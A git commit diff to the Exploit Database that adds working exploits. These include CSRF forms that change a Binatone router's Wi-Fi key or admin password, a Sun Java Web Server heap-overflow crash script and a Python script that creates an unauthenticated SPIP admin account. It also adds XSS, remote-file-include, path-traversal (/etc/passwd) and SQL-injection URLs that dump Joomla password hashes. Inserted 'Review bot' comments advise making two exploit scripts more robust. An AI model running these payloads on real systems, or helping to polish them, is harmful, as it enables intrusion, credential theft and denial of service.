Updated 05_23_2014

This commit is contained in:
Offensive Security 2014-05-23 04:36:15 +00:00
parent 5b5e154bd7
commit 3a4999409a
25 changed files with 864 additions and 0 deletions


@ -30111,6 +30111,7 @@ id,file,description,date,author,platform,type,port
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
@ -30135,3 +30136,26 @@ id,file,description,date,author,platform,type,port
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0
33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 'SERVER' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 Cross Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 'referer' Parameter Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 Cross Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0
33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 'stop' Parameter Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0
33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33467,platforms/php/webapps/33467.txt,"WMNews 'admin/wmnews.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33469,platforms/php/webapps/33469.txt,"LXR 0.9.x Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0
33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0
33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 'auth.asp' Cross Site Scripting Vulnerability",2010-01-06,POPCORN,hardware,remote,0
33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow Vulnerability",2010-01-06,"Evgeny Legerov",multiple,dos,0
33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0
33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0
33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37646/info
D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example data is available:
The POST variable nickname has been set to 1>">">


@ -0,0 +1,104 @@
# Exploit Title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities
# Date: 05/20/2014
# Author: Samandeep Singh - SaMaN( @samanL33T )
# Vendor Homepage:http://www.binatonetelecom.in/4port-adsl2-wifi-router1.html
# Category: Hardware/Wireless Router
# Firmware Version: T6W-A1.005 and below
# Tested on: Binatone DT 850W Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------------------------------
Disclosure Timeline
~~~~~~~~~~~~~~~~~~~
04/23/2014 Contacted Vendor
04/26/2014 Vendor Replied
04/26/2014 Vulnerability Explained (No reply received)
05/04/2014 Vendor notified about full disclosure in 15 days (No reply)
05/20/2014 Full Disclosure
Technical Details
~~~~~~~~~~~~~~~~~~
Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password, SSId of Wireless network,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
Exploit Code
~~~~~~~~~~~~~
Change Wifi (WPA2/PSK) password & SSID by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/Forms/home_wlan_1"
method="POST" name="form">
<input type="hidden" name="wlanWEBFlag" value="0">
<input type="hidden" name="AccessFlag" value="0">
<input type="hidden" name="wlan_APenable" value="1">
<input type="hidden" name="Countries_Channels" value="INDIA">
<input type="hidden" name="Channel_ID" value="00000000">
<input type="hidden" name="BeaconInterval" value="100">
<input type="hidden" name="RTSThreshold" value="2347">
<input type="hidden" name="FragmentThreshold" value="2346">
<input type="hidden" name="DTIM" value="1">
<input type="hidden" name="WirelessMode" value="802.11b+g+n">
<input type="hidden" name="WLANChannelBandwidth" value="20/40 MHz">
<input type="hidden" name="WLANGuardInterval" value="AUTO">
<input type="hidden" name="WLANMCS" value="AUTO">
<input type="hidden" name="wlan_MBSSIDNumber" value="2">
<input type="hidden" name="WLSSIDIndex" value="1">
<input type="hidden" name="ESSID_HIDE_Selection" value="0">
<input type="hidden" name="ESSID" value="[SSID]">
<input type="hidden" name="WEP_Selection" value="WPA2-PSK">
<input type="hidden" name="TKIP_Selection" value="AES">
<input type="hidden" name="PreSharedKey" value="[PASSWORD]">
<input type="hidden" name="WPARekeyInter" value="3600">
<input type="hidden" name="WDSMode_Selection" value="0">
<input type="hidden" name="WLAN_FltActive" value="0">
<input type="hidden" name="wlanRadiusWEPFlag" value="0">
<input type="hidden" name="MBSSIDSwitchFlag" value="2">
</form>
</body>
</html>
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://TARGET/IP]Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="1">
</form>
</body>
</html>
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/Forms/tools_admin_1"
method="POST" name="form">
<input type="hidden" name="uiViewTools_Password" value="[PASSWORD]">
<input type="hidden" name="uiViewTools_PasswordConfirm" value="[PASSWORD]">
</form>
</body>
</html>
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://TARGET/IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="0">
</form>
</body>
</html>
--
SaMaN
twitter : @samanL33T <https://twitter.com/samanL33T>

54
platforms/multiple/dos/33472.py Executable file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/37648/info
Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability.
Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks.
The following are vulnerable:
Sun Java System Web Server 7.0 prior to 7.0 Update 8
Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12
Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13
#!/usr/bin/env python
# sun_trace.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import sys
def send_req(host,port):
buf="TRACE /%s HTTP/1.0\n" % ("A"*4074)
for i in range(0,10):
buf += "%d"%i + ":\n"
for i in range(ord('a'), ord('z')):
buf += chr(i) + ":\n"
buf += "\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(buf)
resp=""
while 1:
s= sock.recv(4000)
if len(s)<1: break
resp+=s
print list(resp)
if __name__=="__main__":
if len(sys.argv)<3:
print "usage: %s host port" % sys.argv[0]
sys.exit()
send_req(sys.argv[1],int(sys.argv[2]))
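Review bot: send_req creates a socket with `sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)` that is never closed and has no timeout, so if the target accepts the connection but never answers (plausible here, since the request is meant to crash the service) the `sock.recv(4000)` loop blocks forever and the descriptor leaks. Call `sock.settimeout(10)` before `sock.connect((host,port))`, wrap the read loop in `try:`/`finally: sock.close()`, and treat `socket.timeout` as end of response rather than an error. Separately, `print list(resp)` dumps the reply as a one-character-per-element list, which is hard to read; `print repr(resp)` gives the same information in a compact form if this is debugging output.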

70
platforms/php/webapps/33425.py Executable file

@ -0,0 +1,70 @@
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
'''
import urllib, urllib2
import cookielib
import sys
import re
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
if len(sys.argv) < 4:
print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
exit()
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
print "[+] You should receive an email with credentials soon :) "
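Review bot: The first `re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)` returns None when the hidden field is not present (a patched SPIP version, a different page layout, or a non-SPIP URL), and the next line dereferences `m.group(0)` unguarded, so the script dies with an AttributeError instead of an explanatory message. Add `if m is None: sys.exit("[-] formulaire_action_args field not found")` after that search, and the same guard after the second search, which can also return None if the value attribute is shaped differently. Two smaller points: the trailing `;` on the second `re.search` line is a stray statement terminator, and the usage branch calls `exit()` where `sys.exit()` is the portable form, since `sys` is already imported and the bare `exit` builtin is a site hook that is not guaranteed to exist.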

10
platforms/php/webapps/33456.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37558/info
Stardevelop Live Help is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Live Help 2.6.0 is vulnerable; other versions (or products that include Live Help) may also be affected.
http://www.example.com/livehelp/index_offline.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/livehelp/frames.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&URL=www.example.org&SESSION=indoushka@example.org

10
platforms/php/webapps/33457.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37559/info
Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. The attacker may also execute script code in an unsuspecting user's browser or steal cookie-based authentication credentials. Other attacks are also possible.
Photokorn 1.542 is vulnerable; other versions may also be affected.
http://www.example.com/sm-p1542/install.php?lang=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/sm-p1542/index.php?lg=http://www.example.net/c.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37562/info
Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

12
platforms/php/webapps/33459.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37564/info
DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker could exploit these vulnerabilities to obtain sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials.
DieselPay 1.6 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/dieselpay/index.php?read=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37566/info
Magic News Plus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Magic News Plus 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/>[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37567/info
PHPCart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PHPCart 3.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/search.php?action=submit&order_id=[xss]

10
platforms/php/webapps/33462.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37568/info
VirtuaNews Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VirtuaNews Pro 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin.php?username=[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37569/info
VisionGate is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VisionGate 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?url=[xss]

11
platforms/php/webapps/33464.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37573/info
Discuz! is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&page=1
http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37574/info
SLAED CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SLAED CMS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?name=Recommend&stop=<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37593/info
pL-PHP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
pL-PHP 0.9 beta is vulnerable; other versions may also be affected.
http://www.example.com/files/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37600/info
WMNews is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wmnews/admin/wmnews.php/>"><ScRiPt>alert(213771818860)</ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37605/info
MercuryBoard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MercuryBoard 1.1.5 is vulnerable; other versions may also be affected.
http://www.example.com/mercuryboard-1.1.5/index.php/>&#039;><ScRiPt>alert(213771818860)</ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37612/info
LXR Cross Referencer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
LXR Cross Referencer 0.9.5 and 0.9.6 are affected; other versions may also be vulnerable.
http://www.example.com/lxr/ident?i=<script>alert('XSS')</script>

15
platforms/php/webapps/33470.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37613/info
LineWeb is prone to multiple remote vulnerabilities:
- Multiple local file-include vulnerabilities
- An SQL-injection vulnerability
- A security-bypass vulnerability
An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LineWeb 1.0.5 is vulnerable; other versions may also be affected.
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37654/info
RoundCube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37655/info
The DM Orders component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

235
platforms/php/webapps/33475.txt Executable file

@ -0,0 +1,235 @@
source: http://www.securityfocus.com/bid/37669/info
dotProject is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dotProject 2.1.3 is vulnerable; other versions may also be affected.
== Company ===
The company creation screen fails to filter form details before creating
a new company.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new company
2. Click the &#039;Companies&#039; link in the top navigation bar
3. Click the &#039;new company&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for each field except for
phone, phone2, and fax. These fields restrict the input size so simply
put "<script>alert(&#039;1&#039;);</script>" in these fields.
5. Click the &#039;submit&#039; button in the lower right hand corner
6. On the resulting screen the company name XSS will appear.
7. To view the other company XSS attacks browse to
index.php?m=companies&a=view&company_id=X where &#039;X&#039; is the id of the new
company. Alternatively you can click on the &#039;Projects&#039; link in the top
navigation then the &#039;new project&#039; button in the upper right. Create a
new project, selecting the newly created company, which will appear as a
blank choice in the company drop down list. Save the project and then
in the project list click on the company name.
Impact
Any user with the permissions to create new companies can expose other
users of dotProject to XSS attacks.
== Project ===
The project creation screen fails to filter form details before creating
a new project.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new project
2. Click the &#039;Projects&#039; link in the top navigation bar
3. Click the &#039;new project&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Project Name&#039;,
&#039;URL&#039;, &#039;Starting URL&#039;, and &#039;Description&#039; fields
5. Click the &#039;submit&#039; button in the lower right hand corner
6. On the resulting screen the project name XSS will appear.
7. To view the other project XSS attacks browse to
index.php?m=projects&a=view&project_id=X where &#039;X&#039; is the id of the new
project.
Impact
Any user with the permissions to create new projects can expose other
users of dotProject to XSS attacks.
== Task ===
The task creation screen fails to filter form details before creating a
new task.
Proof of Concept
1. Log into dotProject as a user with privileges to create a task
2. Click the &#039;Projects&#039; link in the top navigation bar
3. Click on a project name to which the user account has permissions
4. Click the &#039;new task&#039; button in the upper right
5. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Task Name&#039;, &#039;Web
Address&#039;, &#039;Description&#039;, and &#039;Description&#039; fields
6. Click on the &#039;Dates&#039; tab and select an appropriate date
7. Click the &#039;save&#039; button in the lower right hand corner
8. On the resulting screen the task name XSS will appear.
9. To view the other task summary XSS attacks browse to
index.php?m=tasks&a=view&task_id=X where &#039;X&#039; is the id of the new task.
Impact
Any user with the permissions to create new tasks can expose other users
of dotProject to XSS attacks.
== Task Log ===
The task log creation screen fails to filter form details before
creating a new task log.
Proof of Concept
1. Log into dotProject as a user with privileges to create a task
2. Click the &#039;Tasks&#039; link in the top navigation bar
3. Click on a task name to which the user account has permissions
4. Click the &#039;New Log&#039; tab
5. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Summary&#039;, and
&#039;Description&#039; fields, enter ""><script>alert(&#039;log url&#039;);</script>" for
the &#039;URL&#039; field
6. Click the &#039;update task&#039; button in the lower right hand corner
7. On the resulting screen the task name XSS will appear.
8. To view the other task log XSS attacks browse to
index.php?m=tasks&a=view&task_id=X where &#039;X&#039; is the id of the task.
Impact
Any user with the permissions to create new task logs (virtually all
dotProject users) can expose other users of dotProject to XSS attacks.
== Files ===
The file attachment screen fails to filter form details before creating
a new file attachment.
Proof of Concept
1. Log into dotProject as a user with privileges to create a file
2. Click the &#039;Files&#039; link in the top navigation bar
3. Click on a &#039;new folder&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Folder Name&#039;, and
&#039;Description&#039; fields
5. Click on the &#039;new file&#039; button in the upper right
6. Observer the &#039;Folder name&#039; XSS
7. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Description&#039; field
and choose a file to upload
8. Click the &#039;submit&#039; button in the lower right hand corner
9. On the resulting screen the file description XSS will appear.
Impact
Any user with the permissions to create new files can expose other users
of dotProject to XSS attacks.
== Events ===
The events screen fails to filter form details before creating a new events.
Proof of Concept
1. Log into dotProject as a user with privileges to create an event
2. Select &#039;Event&#039; from the &#039;-New Item-&#039; drop down in the upper right or
navigate to index.php?m=calendar&a=addedit
3. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Event Title&#039;, and
&#039;Description&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Event screen
index.php?m=calendar&a=view&event_id=X where &#039;X&#039; is the id of the new event.
Impact
Any user with the permissions to create new events can expose other
users of dotProject to XSS attacks.
== Contacts ===
The contacts screen fails to filter form details before creating a new
events.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new contact
2. Select &#039;Contact&#039; from the &#039;-New Item-&#039; drop down in the upper right
or navigate to index.php?m=contacts&a=addedit
3. Fill in "<script>alert(&#039;xss&#039;);</script>" for every field
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Contact screen
index.php?m=contacts&a=view&contact_id=X where &#039;X&#039; is the id of the new
contact.
Impact
Any user with the permissions to create new contacts can expose other
users of dotProject to XSS attacks.
== Tickets ===
The Submit Trouble Ticket screen fails to filter form details before
creating a new ticket.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new ticket
2. Click the &#039;Tickets&#039; link in the top navigation bar or navigate to
index.php?m=ticketsmith&a=post_ticket
3. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;E-mail&#039; field
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Contact screen
index.php?m=ticketsmith&a=view&ticket=X where &#039;X&#039; is the id of the new
contact.
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
== Forums ===
The Add Forum screen fails to filter form details before creating a new
forum.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new forum
2. Click the &#039;Forums&#039; link in the top navigation bar or navigate to
index.php?m=forums&a=post_ticket
3. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;Forum Name&#039; and
&#039;Description&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the Forums screen index.php?m=forums
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
== Forum Topics ===
The Forum Add Message screen fails to filter form details before
creating a new topic.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new forum
topic
